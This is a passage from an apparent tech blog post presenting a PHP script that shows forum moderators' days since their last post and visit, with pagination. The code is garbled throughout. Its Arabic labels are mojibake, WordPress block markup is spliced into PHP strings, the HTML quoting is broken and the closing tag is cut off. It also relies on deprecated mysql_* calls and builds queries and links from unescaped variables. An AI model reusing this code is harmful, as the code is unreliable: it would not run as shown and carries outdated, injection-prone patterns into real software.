mktime(0,0,0,$tmo1,$tda1,$tyr1))/86400))); // TODAY'S DAY NUMBER $tdate1=$tyr1 ."-" .$tmo1. "-" .$tda1; $m=count_days ($tdate,$tdate1); //get the title $query2 = "select field15 from userfield where userid=\"$row[2]\""; $result2 = mysql_query($query2); //color the if > 90 days if ($m > 90) { $m= "<b> $m </b>"; } else if ($m > 60 and $m < 90) { $m= "<b> $m </b>"; } else if ($m > 30 and $m < 60) { $m= "<b> $m </b>"; } while ($row2 = mysql_fetch_row($result2)) { $theout.= ""; } } //end loop $theout.="
<table border="1" width="50%">
<tbody>
<tr>
<td align="center"><b><strong><span style="color: #990000;">ÇáÅÓã</span></strong></b></td>
<td align="center"><strong><span style="color: #990000;"><b>ÇáãäÕÈ</b></span></strong></td>
<td align="center"><strong><span style="color: #990000;"><b>ÚÏÏ ÇáÃíÇã ãä ÃÎÑ ãÔÇÑßÉ</b></span></strong></td>
<td align="center"><strong><span style="color: #990000;"><b>ÚÏÏ ÇáÃíÇã ãä ÃÎÑ ÒíÇÑÉ</b></span></strong></td>
<td align="center"><strong><span style="color: #990000;"><b>ÊÇÑíÎ ÃÎÑ ãÔÇÑßÉ</b></span></strong></td>
<td align="center"><strong><span style="color: #990000;"><b>ÊÇÑíÎ ÃÎÑ ÏÎæá</b></span></strong></td>
</tr>
<tr>
<td align="right">[<a href="private.php?do=newpm&u=$row[2]"><img src="images/mail.gif" alt="\"ÃÑÓá" width="16" border="0"></a>] <a href="\"member.php?u=$row[2]"><b>$row[0]</b></a> [<a href="search.php?do=finduser&u=$row[2]"><img src="images/postbit_find.gif" alt="\"ÅÓÊÚÑÇÖ" border="0"></a>]</td>
<td align="center">$row2[0]</td>
<td align="center">$m íæã</td>
<td align="center">$mx íæã</td>
<td align="center">$tdate2</td>
<td align="center">$tdate6</td>
</tr>
</tbody>
</table>
<br><br>"; $PHP_SELF="http://www.om77.net/showmodav.php"; if($page != 1){ $temppage=$page; $pageprev = $temppage-1; // Fancy way of subtracting 1 from $page $theout.=("<a href="\"$PHP_SELF?&page=$pageprev\""> <<ÇáÓÇÈÞ </a> "); }else $theout.=(" <<ÇáÓÇÈÞ "." "); // If we're on page 1, PREV is not a link $numofpages = $totalrows / $limit; //$theout.= "$numofpages"; for($i = 1; $i <= $numofpages; $i++) { //for($i = round($numofpages); $i >1 ; $i--){ /* This for loop will add 1 to $i at the end of each pass until $i is greater than $numofpages (4.08). */ if($i!= $page){ $theout.=("<a href="\"$PHP_SELF?&page=$i\"">[$i]</a> "); }else{ $theout.=("[".$i."] "); } /* This if statement will not make the current page number available in link form. It will, however, make all other pages available in link form. */ } // This ends the for loop if(($totalrows % $limit) != 0){ if($i != $page){ $theout.=("<a href="\"$PHP_SELF?&page=$i\"">[$i]</a> "); }else{ $theout.=("[".$i."] "); } /* This is the exact statement that turns pages into link form that is used above */ } // Ends the if statement if(($totalrows - ($limit * $page)) > 0){ /* This statement checks to see if there are more rows remaining, meaning there are pages in front of the current one. */ $temppage=$page; $pagenext = $temppage+1; // Fancy way of adding 1 to page $theout.=("<a href="\"$PHP_SELF?page=$pagenext\""> ÇáÊÇáí>> </a>"); /* Since there are pages remaining, this outputs NEXT in link form. */ }else{ $theout.=(" ÇáÊÇáí>> "); /* If we're on the last page possible, NEXT will NOT be displayed in link form. */ } mysql_free_result($result); /* This line is not required, since MySQL will free the result after all scripts have finished executing; however, it's a nice little backup. */ // The next line tells the server to stop parsing PHP $theout.= "</center>
<!-- /wp:html -->





$theout.= "";

$theout.= ";

<!-- wp:html -->
<center>"; $theout.= "test $totalmod"; $theout.= "</center>
<!-- /wp:html -->







/* useful hints for dates functionality

$yesterday = mktime(0,0,0,date("m"),date("d")-1,date("y"));

$today = mktime(0,0,0,date("m"),date("d"),date("y"));

$tomorrow = mktime(0,0,0,date("m"),date("d")+1,date("y"));

$lastmonth = mktime(0,0,0,date("m")-1,date("d"),date("y"));

$lastyear = mktime(0,0,0,date("m"),date("d"),date("y")-1);

$nextyear = mktime(0,0,0,date("m"),date("d"),date("y")+1);

$yesterday = strftime("%A %B %d, %Y",$yesterday);

$today = strftime("%A %B %d, %Y",$today);

$tomorrow = strftime("%A %B %d, %Y",$tomorrow);

$lastmonth = strftime("%A %B %d, %Y",$lastmonth);

$nextmonth = strftime("%A %B %d, %Y",$nextmonth);

$lastyear = strftime("%A %B %d, %Y",$lastyear);

$nextyear = strftime("%A %B %d, %Y",$nextyear);



*/




$templater->register('theout', $theout);
//print_output($templater->render());


//end of code
?
PHP

  
Now call the script by the following url:
http://www.yoursite.com/showmodav.php 


 

Posted in Tech BlogTags:
© 2024 Warith AL Maawali. All Rights Reserved.
Stay Secure, Stay Assured.